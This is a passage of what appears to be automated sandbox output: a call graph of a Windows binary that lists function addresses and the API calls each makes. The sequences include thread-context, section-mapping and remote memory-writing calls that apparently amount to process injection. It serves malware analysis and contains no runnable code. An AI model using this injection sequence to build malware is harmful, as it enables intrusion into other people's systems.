11456 44598d0 2 API calls 11455->11456 11455->11457 11456->11457 11457->11347 11458->11369 11461 445ca21 11459->11461 11460 445ca25 11460->11373 11461->11460 11547 445c9f3 11461->11547 11464 445ca36 11464->11373 11465 445ca4a FindCloseChangeNotification 11465->11464 11560 445c92f GetCurrentThread OpenThreadToken 11466->11560 11469 445cb10 11469->11374 11470 445c986 6 API calls 11474 445ca8e FindCloseChangeNotification 11470->11474 11472 445cb06 11473 4458ddf 2 API calls 11472->11473 11473->11469 11474->11469 11474->11472 11476 445f3bf 11475->11476 11478 445e08e 11476->11478 11565 4459ab3 11476->11565 11479 445f365 11478->11479 11480 445f37c 11479->11480 11481 445f39c 11480->11481 11482 4459ab3 RtlAllocateHeap 11480->11482 11481->11379 11483 445f389 11482->11483 11483->11379 11570 445c778 11484->11570 11486 445c86e 11487 445c64d 11486->11487 11488 445c668 11487->11488 11489 4459f6b 2 API calls 11488->11489 11490 445c672 11489->11490 11585 44636d5 11490->11585 11492 445c6bd 11493 4458d87 2 API calls 11492->11493 11495 445c6c9 11493->11495 11494 445c687 11494->11492 11496 44636d5 2 API calls 11494->11496 11497 4459bd5 11495->11497 11496->11494 11498 4459be1 MultiByteToWideChar 11497->11498 11499 4459bdc 11497->11499 11500 4459bf5 11498->11500 11499->11388 11500->11388 11502 4459f6b 2 API calls 11501->11502 11503 445c88b 11502->11503 11504 4459f6b 2 API calls 11503->11504 11506 445c89a 11504->11506 11505 445c92a 11514 445cbd7 11505->11514 11506->11505 11507 44636d5 2 API calls 11506->11507 11509 445c8eb 11506->11509 11507->11506 11508 44636d5 2 API calls 11508->11509 11509->11508 11510 445c916 11509->11510 11511 4458d87 2 API calls 11510->11511 11512 445c922 11511->11512 11513 4458d87 2 API calls 11512->11513 11513->11505 11515 445cbef 11514->11515 11516 445c986 6 API calls 11515->11516 11518 445cbf3 11515->11518 11517 445cc07 11516->11517 11517->11518 11519 4458ddf 2 API calls 11517->11519 11518->11393 11519->11518 11521 445dde4 11520->11521 11522 445ddd3 GetCurrentProcess IsWow64Process 11520->11522 11523 445dde7 11521->11523 11522->11521 11524 445ddf6 GetSystemInfo 11523->11524 11525 445ddf1 11523->11525 11524->11398 11525->11398 11527 445e31e 11526->11527 11528 4463586 11526->11528 11530 44598d0 11527->11530 11528->11527 11529 44636d5 2 API calls 11528->11529 11529->11528 11590 4459858 11530->11590 11533 445db68 11537 445dd4d 11533->11537 11534 4459f6b 2 API calls 11534->11537 11536 445dd7d 11596 445baf6 CreateToolhelp32Snapshot 11536->11596 11537->11534 11537->11536 11539 4458d87 2 API calls 11537->11539 11604 4459d29 11537->11604 11539->11537 11540 445dd99 11542 445ddb6 11540->11542 11610 4459e22 11540->11610 11542->11410 11544 4458f63 memset 11543->11544 11545 4459ff8 _vsnwprintf 11544->11545 11546 445a015 11545->11546 11546->11404 11550 445c986 GetTokenInformation 11547->11550 11551 445c9a8 GetLastError 11550->11551 11553 445c9c5 11550->11553 11552 445c9b3 11551->11552 11551->11553 11559 4458dc9 RtlAllocateHeap 11552->11559 11553->11464 11553->11465 11555 445c9bb 11555->11553 11556 445c9c9 GetTokenInformation 11555->11556 11556->11553 11557 445c9de 11556->11557 11558 4458ddf 2 API calls 11557->11558 11558->11553 11559->11555 11561 445c97c 11560->11561 11562 445c950 GetLastError 11560->11562 11561->11469 11561->11470 11562->11561 11563 445c95d OpenProcessToken 11562->11563 11563->11561 11566 4459abc 11565->11566 11568 4459ace 11565->11568 11569 4458dc9 RtlAllocateHeap 11566->11569 11568->11478 11569->11568 11571 4458f63 memset 11570->11571 11572 445c79a lstrcpynW 11571->11572 11574 4459f85 2 API calls 11572->11574 11575 445c7cf GetVolumeInformationW 11574->11575 11576 4458d9a 2 API calls 11575->11576 11577 445c804 11576->11577 11578 4459fe4 2 API calls 11577->11578 11579 445c825 lstrcatW 11578->11579 11583 445a5e9 11579->11583 11582 445c84b 11582->11486 11584 445a5f1 CharUpperBuffW 11583->11584 11584->11582 11586 44636e5 11585->11586 11587 4463718 lstrlenW 11586->11587 11589 4463735 _ftol2_sse 11587->11589 11589->11494 11591 4459868 11590->11591 11591->11591 11592 44636d5 2 API calls 11591->11592 11593 4459883 11592->11593 11594 44636d5 2 API calls 11593->11594 11595 44598b7 11593->11595 11594->11593 11595->11533 11597 445bb20 11596->11597 11598 445bb4b 11596->11598 11599 4458f63 memset 11597->11599 11598->11540 11600 445bb32 Process32First 11599->11600 11600->11598 11601 445bb59 11600->11601 11602 445bb7e FindCloseChangeNotification 11601->11602 11616 445daf2 11601->11616 11602->11598 11606 4459d3d 11604->11606 11619 4458dc9 RtlAllocateHeap 11606->11619 11607 4459e0c 11607->11537 11609 4459d95 11609->11607 11620 4458dc9 RtlAllocateHeap 11609->11620 11613 4459e33 11610->11613 11614 4459e6e 11610->11614 11611 4459e65 11612 4458ddf 2 API calls 11611->11612 11612->11614 11613->11611 11613->11614 11615 4458ddf 2 API calls 11613->11615 11614->11540 11615->11613 11617 445db54 Sleep 11616->11617 11618 445db03 11616->11618 11617->11601 11618->11617 11619->11609 11620->11609 11622 445d7e7 11621->11622 11652 4458dc9 RtlAllocateHeap 11622->11652 11624 445d878 11624->11414 11629 445b6e3 11624->11629 11625 4459f85 2 API calls 11627 445d81b 11625->11627 11626 4458d9a 2 API calls 11626->11627 11627->11624 11627->11625 11627->11626 11628 4459ab3 RtlAllocateHeap 11627->11628 11628->11627 11630 445b6fc 11629->11630 11653 445b632 11630->11653 11634 4458f63 memset 11633->11634 11635 445be26 11634->11635 11636 4458f63 memset 11635->11636 11637 445be33 CreateProcessW 11636->11637 11637->11426 11662 445d309 11638->11662 11645 4458f63 memset 11646 445da24 GetThreadContext 11645->11646 11647 445da4e NtProtectVirtualMemory 11646->11647 11649 445dace 11646->11649 11648 445da90 NtWriteVirtualMemory 11647->11648 11647->11649 11648->11649 11650 445daad NtProtectVirtualMemory 11648->11650 11709 445d47c 11649->11709 11650->11649 11651->11426 11652->11627 11654 446357b 2 API calls 11653->11654 11655 445b64a 11654->11655 11656 4459f6b 2 API calls 11655->11656 11657 445b674 11656->11657 11658 4459fa5 2 API calls 11657->11658 11659 445b6d2 11658->11659 11660 4458d87 2 API calls 11659->11660 11661 445b6dd 11660->11661 11661->11426 11663 445d325 11662->11663 11664 445d337 11662->11664 11663->11664 11665 445d464 11663->11665 11666 4459f85 2 API calls 11664->11666 11665->11649 11688 445d538 11665->11688 11667 445d344 11666->11667 11668 4459fe4 2 API calls 11667->11668 11669 445d37d 11668->11669 11670 4459f85 2 API calls 11669->11670 11671 445d39c 11670->11671 11714 4459c50 11671->11714 11674 4458d9a 2 API calls 11675 445d3c4 11674->11675 11676 4459c50 2 API calls 11675->11676 11677 445d3e7 LoadLibraryW 11676->11677 11679 445d420 11677->11679 11680 445d412 11677->11680 11682 4458ddf 2 API calls 11679->11682 11681 445f08e 3 API calls 11680->11681 11681->11679 11683 445d435 11682->11683 11684 4458f63 memset 11683->11684 11685 445d447 11684->11685 11685->11665 11686 4458ddf 2 API calls 11685->11686 11687 445d462 11686->11687 11687->11665 11689 445d56b 11688->11689 11690 445d58c NtCreateSection 11689->11690 11691 445d77f 11689->11691 11690->11691 11692 445d5b5 RegisterClassExA 11690->11692 11696 445d7b4 11691->11696 11701 445d7b0 NtUnmapViewOfSection 11691->11701 11693 445d645 NtMapViewOfSection 11692->11693 11694 445d609 CreateWindowExA 11692->11694 11693->11691 11700 445d678 NtMapViewOfSection 11693->11700 11694->11693 11695 445d633 DestroyWindow UnregisterClassA 11694->11695 11695->11693 11697 445d7bd NtClose 11696->11697 11698 445d7c8 11696->11698 11697->11698 11698->11645 11698->11649 11700->11691 11702 445d69c 11700->11702 11701->11696 11703 4458e2e RtlAllocateHeap 11702->11703 11704 445d6ac 11703->11704 11704->11691 11705 445d6bb VirtualAllocEx WriteProcessMemory 11704->11705 11706 4458ddf 2 API calls 11705->11706 11707 445d702 11706->11707 11708 445d765 lstrlenW 11707->11708 11708->11691 11710 445d485 FreeLibrary 11709->11710 11711 445d493 11709->11711 11710->11711 11712 4458ddf 2 API calls 11711->11712 11713 445d4b4 11711->11713 11712->11713 11713->11426 11715 4459c62 11714->11715 11720 4458dc9 RtlAllocateHeap 11715->11720 11717 4459c81 11718 4459c9e 11717->11718 11719 4459c8d lstrcatW 11717->11719 11718->11674 11719->11717 11720->11717 11810 445a7c6 11721->11810 11724 4460cd9 11874 4458dc9 RtlAllocateHeap 11724->11874 11726 4460ce0 11727 4460cea 11726->11727 11875 445b553 11726->11875 11727->11431 11730 4460d2e 11730->11431 11735 4460ac8 14 API calls 11736 4460d2b 11735->11736 11736->11431 11912 445ab83 11737->11912 11740 4456319 11741 445b6e3 7 API calls 11740->11741 11742 4456336 11741->11742 11743 4456219 11742->11743 11744 4455c8c 10 API calls 11742->11744 11743->11437 11743->11438 11745 4456370 11744->11745 11745->11743 11943 445ab69 11745->11943 11748 4456382 lstrcmpiW 11748->11743 11750 445b6e3 7 API calls 11749->11750 11751 4455ca5 11750->11751 11752 4455cb2 11751->11752 11753 4459bfd 2 API calls 11751->11753 11754 4455cd5 11753->11754 11947 445b270 11754->11947 11756 4455ce5 11759 445b270 2 API calls 11756->11759 11760 4455d09 11756->11760 11757 4458ddf 2 API calls 11758 4455d15 11757->11758 11761 445618c 11758->11761 11759->11760 11760->11757 11762 445ab69 4 API calls 11761->11762 11763 4456196 11762->11763 11764 44561a4 lstrcmpiW 11763->11764 11770 445619f 11763->11770 11765 44561d6 11764->11765 11766 44561ba 11764->11766 11767 4458ddf 2 API calls 11765->11767 11952 445ac61 11766->11952 11767->11770 11770->11450 12001 4458dc9 RtlAllocateHeap 11772->12001 11774 44560eb 11775 445612f 11774->11775 11776 44560fe GetDriveTypeW 11774->11776 12002 4452bee 11775->12002 11776->11775 11778 445614b 11779 4456169 11778->11779 12021 4455315 11778->12021 12074 445b162 11779->12074 11783 445b162 2 API calls 11784 4456185 11783->11784 11784->11441 11786 445109a 2 API calls 11785->11786 11787 4460ad7 11786->11787 12613 44567db memset 11787->12613 11790 4458d9a 2 API calls 11791 4460afd 11790->11791 11805 4460b76 11791->11805 12625 445aaff 11791->12625 11795 4460b28 11796 445109a 2 API calls 11795->11796 11795->11805 11797 4460b3a 11796->11797 11798 4459fe4 2 API calls 11797->11798 11799 4460b49 11798->11799 11800 445b787 2 API calls 11799->11800 11801 4460b5c 11800->11801 11802 4460b6a 11801->11802 12629 445af67 11801->12629 11804 4458ddf 2 API calls 11802->11804 11804->11805 11805->11450 11807 44560d1 11806->11807 12642 44559f4 11807->12642 11849 4458dc9 RtlAllocateHeap 11810->11849 11812 445a7f0 11837 44561f3 11812->11837 11850 445c5c6 11812->11850 11815 4459f6b 2 API calls 11816 445a830 11815->11816 11817 445a96e 11816->11817 11822 445a85c 11816->11822 11818 445a980 11817->11818 11819 445a9bf 11817->11819 11821 445a96a 11818->11821 11823 4459bfd 2 API calls 11818->11823 11820 4459bfd 2 API calls 11819->11820 11820->11821 11824 4458d87 2 API calls 11821->11824 11822->11821 11860 4459bfd 11822->11860 11823->11821 11825 445a9df 11824->11825 11828 4458ddf 2 API calls 11825->11828 11841 445aa3a 11825->11841 11829 445aa75 11828->11829 11830 4458f63 memset 11829->11830 11830->11841 11831 445a924 11836 4459bfd 2 API calls 11831->11836 11832 4459f85 2 API calls 11833 445a8c2 11832->11833 11835 4459c50 2 API calls 11833->11835 11834 4458ddf 2 API calls 11834->11837 11838 445a8d4 11835->11838 11839 445a94b 11836->11839 11837->11430 11837->11431 11837->11724 11840 4458d9a 2 API calls 11838->11840 11844 4458ddf 2 API calls 11839->11844 11842 445a8e2 11840->11842 11841->11834 11841->11841 11866 4459b26 11842->11866 11844->11821 11846 4458ddf 2 API calls 11847 445a919 11846->11847 11848 4458ddf 2 API calls 11847->11848 11848->11831 11849->11812 11851 445c5df 11850->11851 11852 44636d5 2 API calls 11851->11852 11853 445c5ef 11852->11853 11854 4459f6b 2 API calls 11853->11854 11855 445c5fe 11854->11855 11856 445c63a 11855->11856 11858 44636d5 2 API calls 11855->11858 11857 4458d87 2 API calls 11856->11857 11859 445a811 11857->11859 11858->11855 11859->11815 11861 4459c0f 11860->11861 11872 4458dc9 RtlAllocateHeap 11861->11872 11863 4459c2c 11864 4459c49 11863->11864 11865 4459c38 lstrcatA 11863->11865 11864->11825 11864->11831 11864->11832 11865->11863 11867 4459b5c 11866->11867 11868 4459b2f 11866->11868 11867->11846 11873 4458dc9 RtlAllocateHeap 11868->11873 11870 4459b41 11870->11867 11871 4459b49 MultiByteToWideChar 11870->11871 11871->11867 11872->11863 11873->11870 11874->11726 11876 445b564 11875->11876 11877 445b56b 11875->11877 11876->11730 11881 4460b84 11876->11881 11877->11876 11878 445b595 11877->11878 11906 4458dc9 RtlAllocateHeap 11877->11906 11878->11876 11880 4458ddf 2 API calls 11878->11880 11880->11876 11907 4458dc9 RtlAllocateHeap 11881->11907 11883 4460cd1 11902 445fb9c 11883->11902 11884 4460b97 11884->11883 11885 445109a 2 API calls 11884->11885 11889 4460c86 11884->11889 11886 4460bcd 11885->11886 11888 4459f85 2 API calls 11886->11888 11887 4458ddf 2 API calls 11887->11883 11890 4460bf1 11888->11890 11889->11887 11891 4459c50 2 API calls 11890->11891 11892 4460c0f 11891->11892 11893 445b553 3 API calls 11892->11893 11894 4460c1c 11893->11894 11895 4458d9a 2 API calls 11894->11895 11896 4460c28 11895->11896 11897 4458d9a 2 API calls 11896->11897 11898 4460c31 11897->11898 11899 4458ddf 2 API calls 11898->11899 11900 4460c7b 11899->11900 11901 4458ddf 2 API calls 11900->11901 11901->11889 11903 445fbc0 11902->11903 11908 4460485 11903->11908 11906->11878 11907->11884 11910 446049e 11908->11910 11909 44604bf lstrlenW 11911 445fbd2 11909->11911 11910->11909 11910->11910 11911->11735 11915 445ab93 11912->11915 11920 445acb3 11915->11920 11918 445602f 11918->11740 11919 4458ddf 2 API calls 11919->11918 11921 445acd5 11920->11921 11934 445a766 11921->11934 11923 445acdf 11928 445abac 11923->11928 11937 445ceb8 11923->11937 11925 445adac 11926 4458ddf 2 API calls 11925->11926 11926->11928 11927 445ad13 11927->11925 11929 4460485 lstrlenW 11927->11929 11928->11918 11928->11919 11930 445ad64 11929->11930 11931 445ad87 11930->11931 11933 4458e2e RtlAllocateHeap 11930->11933 11932 4458ddf 2 API calls 11931->11932 11932->11925 11933->11931 11941 4458dc9 RtlAllocateHeap 11934->11941 11936 445a772 11936->11923 11938 445cede 11937->11938 11940 445cee2 11938->11940 11942 4458dc9 RtlAllocateHeap 11938->11942 11940->11927 11941->11936 11942->11940 11944 445ab6e 11943->11944 11945 445acb3 4 API calls 11944->11945 11946 445637e 11945->11946 11946->11743 11946->11748 11948 445b27f 11947->11948 11951 445b27a 11947->11951 11949 445b296 GetLastError 11948->11949 11950 445b2a1 GetLastError 11948->11950 11949->11951 11950->11951 11951->11756 11968 445ac6f 11952->11968 11955 445c402 SetFileAttributesW 11956 4458f63 memset 11955->11956 11957 445c42f 11956->11957 11958 445c450 11957->11958 11959 44636d5 2 API calls 11957->11959 11958->11765 11960 445c46c 11959->11960 11961 4459fe4 2 API calls 11960->11961 11962 445c47d 11961->11962 11963 4459c50 2 API calls 11962->11963 11964 445c48e 11963->11964 11964->11958 11989 445c32f 11964->11989 11967 4458ddf 2 API calls 11967->11958 11969 445ac7f 11968->11969 11972 445adde 11969->11972 11973 44561cb 11972->11973 11974 445adfb 11972->11974 11973->11765 11973->11955 11974->11973 11975 44636d5 2 API calls 11974->11975 11976 445ae3f 11975->11976 11988 4458dc9 RtlAllocateHeap 11976->11988 11978 445ae53 11978->11973 11979 446357b 2 API calls 11978->11979 11980 445ae95 11979->11980 11981 4460485 lstrlenW 11980->11981 11982 445aed6 11981->11982 11983 445a766 RtlAllocateHeap 11982->11983 11986 445aee2 11983->11986 11984 445af4c 11985 4458ddf 2 API calls 11984->11985 11985->11973 11986->11984 11987 4458ddf 2 API calls 11986->11987 11987->11984 11988->11978 11990 445c352 11989->11990 11991 445c35a memset 11990->11991 12000 445c3c9 11990->12000 11992 4459f85 2 API calls 11991->11992 11993 445c376 11992->11993 11994 44636d5 2 API calls 11993->11994 11995 445c392 11994->11995 11996 4459fe4 2 API calls 11995->11996 11997 445c3a8 11996->11997 11998 4458d9a 2 API calls 11997->11998 11999 445c3b1 MoveFileW 11998->11999 11999->12000 12000->11967 12001->11774 12003 4451080 2 API calls 12002->12003 12004 4452c07 12003->12004 12082 445b330 12004->12082 12007 4458d87 2 API calls 12008 4452c2a 12007->12008 12009 4451080 2 API calls 12008->12009 12020 4452c5a 12008->12020 12010 4452c38 12009->12010 12092 4459124 12010->12092 12013 4458d87 2 API calls 12014 4452c56 12013->12014 12014->12020 12100 445b12f 12014->12100 12016 4452c70 12113 44594d4 12016->12113 12019 4458ddf 2 API calls 12019->12020 12020->11778 12198 445f1c7 12021->12198 12024 4455582 12024->11779 12025 445c85a 9 API calls 12026 445533a 12025->12026 12027 445b6e3 7 API calls 12026->12027 12028 4455346 12027->12028 12211 445b222 12028->12211 12030 4455352 12030->12024 12031 445f0d9 8 API calls 12030->12031 12032 4455371 12031->12032 12033 4459f85 2 API calls 12032->12033 12034 4455382 12033->12034 12035 4459c50 2 API calls 12034->12035 12036 445539b 12035->12036 12037 4458d9a 2 API calls 12036->12037 12039 44553ae 12037->12039 12038 44553c1 12041 4458ddf 2 API calls 12038->12041 12039->12038 12216 445b145 12039->12216 12042 44553d6 12041->12042 12222 445503f memset 12042->12222 12045 4458f63 memset 12046 445542e 12045->12046 12278 445f323 12046->12278 12047 445558b 12048 4459f85 2 API calls 12047->12048 12049 4455595 12048->12049 12051 4459c50 2 API calls 12049->12051 12056 44555ac 12051->12056 12052 44555dc 12053 4458d9a 2 API calls 12052->12053 12055 44555e8 lstrcpynW lstrcpynW 12053->12055 12057 445562d 12055->12057 12056->12052 12059 4458ddf 2 API calls 12056->12059 12060 4458ddf 2 API calls 12057->12060 12058 44554af 12283 4458dc9 RtlAllocateHeap 12058->12283 12059->12052 12061 445563f 12060->12061 12062 4458ddf 2 API calls 12061->12062 12062->12024 12064 445550b 12064->12024 12065 4459f85 2 API calls 12064->12065 12066 4455520 12065->12066 12075 445b171 12074->12075 12076 445617d 12074->12076 12077 445b196 12075->12077 12079 4458ddf 2 API calls 12075->12079 12076->11783 12078 4458ddf 2 API calls 12077->12078 12080 445b1a1 12078->12080 12079->12075 12081 4458ddf 2 API calls 12080->12081 12081->12076 12083 4459b26 2 API calls 12082->12083 12084 445b350 12083->12084 12085 44636d5 2 API calls 12084->12085 12087 445b39d 12084->12087 12086 445b36f FindResourceW 12085->12086 12086->12084 12086->12087 12088 4458ddf 2 API calls 12087->12088 12089 445b3a8 12088->12089 12090 4458e2e RtlAllocateHeap 12089->12090 12091 4452c1a 12089->12091 12090->12091 12091->12007 12093 4452c47 12092->12093 12094 4459133 12092->12094 12093->12013 12125 4458dc9 RtlAllocateHeap 12094->12125 12096 445913d 12096->12093 12126 4459029 12096->12126 12099 4458ddf 2 API calls 12099->12093 12101 4459124 4 API calls 12100->12101 12102 445b074 12101->12102 12103 445b13d 12102->12103 12169 44592a4 12102->12169 12103->12016 12107 445b120 12108 44594d4 6 API calls 12107->12108 12109 445b128 12108->12109 12109->12016 12110 445b08e 12110->12107 12110->12109 12111 4458e5d 3 API calls 12110->12111 12175 4459a76 12110->12175 12111->12110 12115 44594e3 12113->12115 12124 4452c7b 12113->12124 12114 445951d 12118 445952d 12114->12118 12180 44595fb 12114->12180 12115->12114 12116 4458ddf 2 API calls 12115->12116 12115->12124 12116->12115 12119 4458ddf 2 API calls 12118->12119 12120 4459548 12118->12120 12119->12120 12121 445955e 12120->12121 12123 4458ddf 2 API calls 12120->12123 12122 4458ddf 2 API calls 12121->12122 12122->12124 12123->12121 12124->12019 12125->12096 12140 4458dc9 RtlAllocateHeap 12126->12140 12128 445903e 12131 4459066 12128->12131 12139 445904b 12128->12139 12141 445957a 12128->12141 12129 44590ea 12132 4458ddf 2 API calls 12129->12132 12129->12139 12131->12129 12133 44590b4 12131->12133 12134 445957a lstrlenW 12131->12134 12132->12139 12133->12129 12133->12139 12145 445fd9c 12133->12145 12134->12133 12137 4459104 12138 4458ddf 2 API calls 12137->12138 12138->12139 12139->12093 12139->12099 12140->12128 12142 445959a 12141->12142 12143 4460485 lstrlenW 12142->12143 12144 44595be 12143->12144 12144->12131 12160 4458dc9 RtlAllocateHeap 12145->12160 12147 445ff2f 12148 4458ddf 2 API calls 12147->12148 12150 445ff55 12148->12150 12149 445fdc0 12149->12147 12161 4458dc9 RtlAllocateHeap 12149->12161 12152 4458ddf 2 API calls 12150->12152 12154 445ff63 12152->12154 12153 445fde0 12153->12147 12162 4458dc9 RtlAllocateHeap 12153->12162 12156 44590e3 12154->12156 12158 4458ddf 2 API calls 12154->12158 12156->12129 12156->12137 12157 445fdf4 12157->12147 12163 4458e5d 12157->12163 12158->12156 12160->12149 12161->12153 12162->12157 12168 4458dc9 RtlAllocateHeap 12163->12168 12165 4458e9a 12165->12157 12166 4458e72 12166->12165 12167 4458ddf 2 API calls 12166->12167 12167->12165 12168->12166 12172 44592c7 12169->12172 12170 4458dc9 RtlAllocateHeap 12170->12172 12171 44593fb 12174 4458dc9 RtlAllocateHeap 12171->12174 12172->12170 12172->12171 12173 4458ddf 2 API calls 12172->12173 12173->12172 12174->12110 12176 4459a81 12175->12176 12178 4459a97 12175->12178 12179 4458dc9 RtlAllocateHeap 12176->12179 12178->12110 12179->12178 12192 4458dc9 RtlAllocateHeap 12180->12192 12182 445963e 12182->12118 12183 4459634 12183->12182 12184 4459667 12183->12184 12186 44596e5 12183->12186 12193 4458fb1 12184->12193 12187 4460485 lstrlenW 12186->12187 12190 44596dd 12187->12190 12188 4459673 12189 4460485 lstrlenW 12188->12189 12189->12190 12191 4458ddf 2 API calls 12190->12191 12191->12182 12192->12183 12194 44636d5 2 API calls 12193->12194 12197 4458fca 12194->12197 12195 4458ff7 12195->12188 12196 44636d5 2 API calls 12196->12197 12197->12195 12197->12196 12199 445f1dd 12198->12199 12200 4455328 12198->12200 12201 4459f6b 2 API calls 12199->12201 12200->12024 12200->12025 12202 445f1e9 12201->12202 12203 4459f6b 2 API calls 12202->12203 12204 445f1f8 12203->12204 12204->12200 12205 445f205 GetModuleHandleA 12204->12205 12206 445f212 GetModuleHandleA 12205->12206 12207 445f219 12205->12207 12206->12207 12208 4458d87 2 API calls 12207->12208 12209 445f224 12208->12209 12210 4458d87 2 API calls 12209->12210 12210->12200 12212 445b236 12211->12212 12213 445b246 GetLastError 12212->12213 12214 445b23c GetLastError 12212->12214 12215 445b253 12213->12215 12214->12215 12215->12030 12291 4459183 12216->12291 12218 445b151 12219 445b157 12218->12219 12311 445b074 12218->12311 12219->12038 12223 4455075 12222->12223 12224 44550aa 12223->12224 12324 445308a 12223->12324 12225 445c85a 9 API calls 12224->12225 12229 445510f 12224->12229 12227 44550ba 12225->12227 12228 445c64d 6 API calls 12227->12228 12230 44550ca 12228->12230 12229->12045 12229->12047 12340 4454ffb 12230->12340 12557 445f233 12278->12557 12281 4455464 12281->12047 12281->12058 12282 445f233 39 API calls 12282->12281 12283->12064 12321 4458dc9 RtlAllocateHeap 12291->12321 12293 44591a4 12294 44591b5 lstrcpynW 12293->12294 12302 44591ae 12293->12302 12295 4459228 12294->12295 12296 44591d8 12294->12296 12322 4458dc9 RtlAllocateHeap 12295->12322 12297 445b553 3 API calls 12296->12297 12299 44591e4 12297->12299 12301 445924d 12299->12301 12303 4459029 4 API calls 12299->12303 12300 4459233 12300->12301 12300->12302 12306 4458ddf 2 API calls 12300->12306 12305 4459275 12301->12305 12308 4458ddf 2 API calls 12301->12308 12302->12218 12304 44591fe 12303->12304 12304->12300 12307 4459204 12304->12307 12309 4458ddf 2 API calls 12305->12309 12306->12301 12310 4458ddf 2 API calls 12307->12310 12308->12305 12309->12302 12310->12302 12312 44592a4 3 API calls 12311->12312 12313 445b087 12312->12313 12323 4458dc9 RtlAllocateHeap 12313->12323 12315 445b128 12315->12038 12316 445b120 12317 44594d4 6 API calls 12316->12317 12317->12315 12318 445b08e 12318->12315 12318->12316 12319 4458e5d 3 API calls 12318->12319 12320 4459a76 RtlAllocateHeap 12318->12320 12319->12318 12320->12318 12321->12293 12322->12300 12323->12318 12325 44530a6 12324->12325 12326 445109a 2 API calls 12325->12326 12339 4453141 12325->12339 12327 44530b9 12326->12327 12328 4459c50 2 API calls 12327->12328 12329 44530cb 12328->12329 12330 4458d9a 2 API calls 12329->12330 12331 44530d6 12330->12331 12332 445109a 2 API calls 12331->12332 12333 44530e0 12332->12333 12442 445cf54 12333->12442 12336 4458d9a 2 API calls 12339->12224 12341 4459b26 2 API calls 12340->12341 12342 4455006 12341->12342 12343 4459f85 2 API calls 12342->12343 12344 4455015 12343->12344 12345 4459c50 2 API calls 12344->12345 12346 4455021 12345->12346 12347 4458d9a 2 API calls 12346->12347 12348 445502c 12347->12348 12444 445cf81 12442->12444 12443 44530ee 12443->12336 12444->12443 12448 4458dc9 RtlAllocateHeap 12444->12448 12446 445cfb1 12446->12443 12448->12446 12559 445f267 12557->12559 12560 445f26b 12559->12560 12562 4458dc9 RtlAllocateHeap 12559->12562 12563 4454f5b 12559->12563 12560->12281 12560->12282 12562->12559 12564 4454f7e 12563->12564 12565 4454feb 12564->12565 12566 445503f 34 API calls 12564->12566 12565->12559 12568 4454f9e 12566->12568 12567 4454fdc 12586 4454e19 12567->12586 12568->12565 12568->12567 12571 445bcc1 12568->12571 12572 445bce2 12571->12572 12573 445bcdb 12571->12573 12574 445bcf6 12572->12574 12575 445bcee GetLastError 12572->12575 12573->12568 12575->12573 12587 445670a 5 API calls 12586->12587 12635 4458dc9 RtlAllocateHeap 12613->12635 12615 4456816 12616 4456987 12615->12616 12636 4458dc9 RtlAllocateHeap 12615->12636 12616->11790 12618 4456896 12619 4458ddf 2 API calls 12618->12619 12620 4456979 12619->12620 12621 4458ddf 2 API calls 12620->12621 12621->12616 12622 4458f63 memset 12623 4456830 12622->12623 12623->12616 12623->12618 12623->12622 12624 445c402 11 API calls 12623->12624 12624->12623 12637 445ab0e 12625->12637 12628 4458dc9 RtlAllocateHeap 12628->11795 12630 445af73 12629->12630 12631 445a766 RtlAllocateHeap 12630->12631 12633 445af9b 12631->12633 12632 445b000 12632->11802 12633->12632 12634 4458ddf 2 API calls 12633->12634 12634->12632 12635->12615 12636->12623 12638 445acb3 4 API calls 12637->12638 12639 445ab2d 12638->12639 12640 445ab0b 12639->12640 12641 4458ddf 2 API calls 12639->12641 12640->11805 12640->12628 12641->12640 12643 445aaff 4 API calls 12642->12643 12644 4455a05 12643->12644 12677 4455a67 12644->12677 12678 445b423 12644->12678 12647 445abf8 6 API calls 12648 4455a2b 12647->12648 12683 445f537 12648->12683 12651 445b6e3 7 API calls 12652 4455a49 12651->12652 12652->12677 12690 445a29b 12652->12690 12656 4455a7f 12708 4451486 CreateMutexW 12656->12708 12658 4455a84 12659 445a398 6 API calls 12658->12659 12660 4455a92 12659->12660 12723 44534f7 12660->12723 12677->11442 12679 445a1f8 GetSystemTimeAsFileTime 12678->12679 12680 445b42e 12679->12680 12681 445abc9 6 API calls 12680->12681 12682 4455a19 12681->12682 12682->12647 12684 445f0d9 8 API calls 12683->12684 12685 445f549 12684->12685 12686 445f0d9 8 API calls 12685->12686 12687 445f562 12686->12687 12787 445f4c6 12687->12787 12689 4455a32 12689->12651 12691 445a2ac 12690->12691 12692 4455a71 12691->12692 12801 4458dc9 RtlAllocateHeap 12691->12801 12694 445a398 12692->12694 12695 445a3b6 12694->12695 12696 445a40e 12695->12696 12707 445a3ba 12695->12707 12802 445a2ee 12695->12802 12697 445a41f 12696->12697 12808 4458dc9 RtlAllocateHeap 12696->12808 12699 445b222 2 API calls 12697->12699 12697->12707 12701 445a484 12699->12701 12702 445a4bf 12701->12702 12703 445a4fa SetThreadPriority 12701->12703 12704 445a4e3 12702->12704 12705 4458ddf 2 API calls 12702->12705 12703->12707 12706 4458f63 memset 12704->12706 12705->12704 12706->12707 12707->12656 12709 445149f CreateMutexW 12708->12709 12719 44514ec 12708->12719 12710 44514b1 12709->12710 12709->12719 12711 4451080 2 API calls 12710->12711 12712 44514bb 12711->12712 12713 4459a76 RtlAllocateHeap 12712->12713 12712->12719 12714 44514cb 12713->12714 12715 4458d87 2 API calls 12714->12715 12716 44514d8 12715->12716 12809 4458dc9 RtlAllocateHeap 12716->12809 12718 44514e2 12718->12719 12810 4458dc9 RtlAllocateHeap 12718->12810 12719->12658 12721 4451503 12721->12719 12811 44574d8 12721->12811 12724 4453505 12723->12724 12726 445350a 12723->12726 12815 445cb18 12724->12815 12727 44536a0 12726->12727 12728 445d210 8 API calls 12727->12728 12730 44536bb 12728->12730 12729 44536c4 12740 4452e9f 12729->12740 12730->12729 12822 4458dc9 RtlAllocateHeap 12730->12822 12732 44536d8 12739 44536e2 12732->12739 12823 445ce93 12732->12823 12734 4458ddf 2 API calls 12734->12729 12738 445a398 6 API calls 12738->12739 12739->12734 12741 445aaff 4 API calls 12740->12741 12742 4452ebd 12741->12742 12836 4452de9 12742->12836 12745 4452de9 3 API calls 12746 4452ee4 12745->12746 12840 445ab4b 12746->12840 12749 4459d29 RtlAllocateHeap 12756 4452f38 12788 445f4d4 12787->12788 12789 445f510 12787->12789 12800 4458dc9 RtlAllocateHeap 12788->12800 12791 4459f6b 2 API calls 12789->12791 12792 445f51a 12791->12792 12794 4459a76 RtlAllocateHeap 12792->12794 12793 445f4e5 12797 445f533 12793->12797 12798 4458ddf 2 API calls 12793->12798 12795 445f526 12794->12795 12796 4458d87 2 API calls 12795->12796 